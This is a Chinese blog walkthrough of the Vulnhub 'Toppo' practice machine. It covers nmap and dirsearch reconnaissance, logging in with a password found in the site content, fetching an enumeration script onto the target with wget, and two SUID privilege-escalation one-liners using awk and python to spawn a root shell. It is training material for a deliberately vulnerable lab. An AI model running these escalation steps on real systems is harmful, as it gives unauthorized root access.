Vulnhub-Toppo靶机,python、awk的SUID提权,两种提权方式

Vulnhub-Toppo靶机,SUID提权

这个靶机主要是suid提权,相对简单,靶机下载:

官网链接:https://download.vulnhub.com/toppo/Toppo.zip

image-20250814125553970

使用nmap和dirb进行web打点

nmap -sS 10.10.10.222 -p- -A -T4
dirsearch -u http://10.10.10.222/

image-20250814125614906

web识别,是一个普通的html页面

whatweb http://10.10.10.222/

image-20250814125828904

发现了一个密码信息 12345ted123

image-20250814125935693

我们猜测账号就是那串密码夹着中间的英文ted

image-20250814132647573

登录成功之后就是内网渗透,我们使用FeatherScan进行内网信息收集

git clone https://github.com/baibaixiaoyu2024/FeatherScan.git
cd FeatherScan_v4_5_
python -m http.server

# 靶机
wget 10.10.10.130:8000/FeatherScan_v4_5
wget 10.10.10.130:8000/feather_vuln_db.txt
chmod +x FeatherScan_v4_5
./FeatherScan_v4_5

image-20250814140403074

发现提权漏洞

image-20250814140329034

得到两个提权向量,两个命令都可以用

awk 'BEGIN {system("/bin/sh")}'
python -c 'import os; os.execl("/bin/sh", "sh", "-p")' # 靶机没有sh就用bash替换

image-20250814140600238

至此提权成功!很简单吧

本站内容部分转载于互联网,并不代表本站立场!如若本站内容侵犯了原著者的合法权益,可联系我们进行处理! 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!
THE END
喜欢就支持一下吧
点赞11 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片快捷回复

    暂无评论内容